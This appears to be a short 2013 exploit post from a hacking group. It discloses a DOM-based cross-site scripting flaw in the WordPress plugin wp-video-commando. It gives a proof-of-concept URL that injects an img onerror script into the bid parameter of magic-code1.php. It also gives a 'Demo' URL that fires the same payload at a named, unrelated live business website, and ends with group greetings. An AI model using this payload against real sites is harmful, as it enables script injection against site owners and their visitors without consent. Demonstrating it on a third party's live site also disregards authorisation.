facebook facebook twitter rss

D.o.m Based Xss In wp-video-commando

Author: Darksnipper , Published: 26-03-2013
#######################
Title:D.o.m Based Xss In wp-video-commando
#####################
#Author:Darksnipper & Dr.v!ru$
#Email:Darksnipper@live.com
# www.cybercoders.org
#####################
p.o.c
http: //127.0.0.1/path/wp-content/plugins/wp-video-commando/magic-code1.php?bid=<img
src=x onerror=prompt("xss");>

Demo:
http://www.emergencydentist-southampton.com/wp-content/plugins/wp-video-commando/magic-code1.php?bid=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3B%3E

Image poc:
http://www.foto.pk/images/captureve.png

Greetz:Dream.killer,Soul~inj3ct0r,Error
Haxor,x3o-1337,SOG,Shadow008,1337,H4x0rl1f3,Dr.z0mbie,b0x,over-x,madc0de
Haxor,P4k Command3r,Wg_Eagle,Tor Demon,Zhc snipper,Madleet
Members,Kashmiri Hackers & All Freedom Fighters

Like us on Facebook :